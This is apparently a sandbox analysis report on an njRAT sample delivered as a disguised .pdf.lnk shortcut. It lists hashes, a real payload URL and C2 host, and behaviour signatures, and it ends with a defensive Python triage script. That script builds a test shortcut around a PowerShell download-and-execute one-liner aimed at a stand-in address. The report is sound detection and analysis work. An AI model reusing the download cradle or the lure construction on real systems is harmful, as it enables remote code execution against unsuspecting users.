General

Target: Booking Reclamo.rar
Size: 1KB
Sample: 220711-qba6zahcfj
MD5: a8f1175d93997c603efee5e8cfb048b8
SHA1: 2b04d461f4af94125954752e13655e4512ac5d93
SHA256: 75e7d9d5674a9274db2a258cefd7c03cd076d9615c580df36adc08b22f61333a
SHA512: 5ccb0f4622442009a6ff1550b9a9388500a0be31716511f8e6ecfb6bf93ed4c552575e9b6ab673730ec4551731cc728800bdf1aad7ca7a3c3ca3cf68df04a56e
Static task: static1
Behavioral task: behavioral1
Sample: Booking Reclamo/Comprobante EDO DE CUENTA.pdf.lnk
Resource: win7-20220414-en
Malware Config

Extracted URL: http://20.231.55.108/dll/06-07-2022.PDF

Extracted family: njrat
Version: 0.7NC
Campaign: NYAN CAT
C2: venomsi.mypsx.net:81
(unlabelled): 4c6c9a1bbdc34e6ebe
reg_key: 4c6c9a1bbdc34e6ebe
splitter: @!#&^%$
Targets

Target: Booking Reclamo/Comprobante EDO DE CUENTA.pdf.lnk
Size: 2KB
MD5: 989a37a957676b33b4f844b510ac8a73
SHA1: fd521bf0365d7af925879d7b66dc54025051adb6
SHA256: ff0fd20583b4a4095e261eeeaba1b8be7be1fa837af4c882c9fe093bfd7892ea
SHA512: 93ce019d8ff4b220199e5b2a4eda2d3717f368f7b890eed8eb04aac1dc56e9c2e5dc50b19eb4efde577b58168405eec55b787a80ca670e0e81119dc7943706dc
suricata: ET MALWARE Powershell commands sent B64 2
Blocklisted process makes network request
Checks computer location settings
  Looks up the country code configured in the registry (HKCU\Control Panel\International\Geo\Nation), likely a geofence check.
Drops startup file
Suspicious use of SetThreadContext
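The file under analysis is a Windows shortcut carrying a document-style double extension (.pdf.lnk), and the Suricata alert shows it launched base64-encoded PowerShell. The Python below is an added example, not part of this report or the sample: it parses the Shell Link (MS-SHLLINK) header, skips the LinkTargetIDList and LinkInfo sections, reads the StringData fields in their fixed order, decodes a PowerShell -EncodedCommand (base64 over UTF-16LE), and lists the lure traits it finds. The shortcut it parses is constructed in build_sample_lnk(): the powershell.exe target, the hidden-window arguments, the one-liner and the stage-two URL (198.51.100.7, a documentation address) are assumptions for the demonstration, not the contents of the sample's LNK.

```python
"""Added example: static triage of a Windows shortcut (.lnk) lure."""
import base64
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value lures use so no console window appears

STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.lnk$", re.I)
# -e, -ec, -en, -enc and -encodedcommand are all accepted by powershell.exe
ENC_RE = re.compile(r"(?:^|\s)[-/]e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand and the StringData fields of a Shell Link file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad HeaderSize or LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for flag, name in STRING_FIELDS:  # CountCharacters + String, always in this order
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def decode_encoded_command(arguments: str):
    """Decode a powershell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(filename: str, data: bytes) -> dict:
    """Parse the shortcut and list the lure tricks it relies on."""
    fields = parse_lnk(data)
    findings = []
    if DOUBLE_EXT_RE.search(filename):
        findings.append("double extension hides the .lnk: " + filename)
    target = fields.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if target in INTERPRETERS:
        findings.append("target is an interpreter, not a document: " + target)
    args = fields.get("arguments", "")
    if fields["show_command"] == SW_SHOWMINNOACTIVE or re.search(r"-w(?:indowstyle)?\s+hidden", args, re.I):
        findings.append("window hidden or minimised")
    decoded = decode_encoded_command(args)
    if decoded is not None:
        findings.append("base64 -EncodedCommand decodes to: " + decoded)
        for url in URL_RE.findall(decoded):
            findings.append("decoded command fetches: " + url)
    return {"fields": fields, "decoded_command": decoded, "findings": findings}


def build_sample_lnk() -> bytes:
    """Constructed .pdf.lnk-style shortcut (test input, not the reported sample)."""
    stage2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.pdf')"
    enc = base64.b64encode(stage2.encode("utf-16-le")).decode()
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR
             | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"  # IDList holding only the TerminalID

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = (string_data(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
            + string_data(r"C:\Windows\System32")
            + string_data("-w hidden -nop -ep bypass -enc " + enc)
            + string_data(r"%SystemRoot%\System32\imageres.dll"))
    return header + id_list + body + b"\x00\x00\x00\x00"  # TerminalBlock closes ExtraData


if __name__ == "__main__":
    for line in triage("Comprobante EDO DE CUENTA.pdf.lnk", build_sample_lnk())["findings"]:
        print(line)
```

Run against a real shortcut with `triage(path.name, path.read_bytes())`; the decoded command gives the second-stage URL to pivot on, which is the kind of indicator the Extracted field above records for this sample.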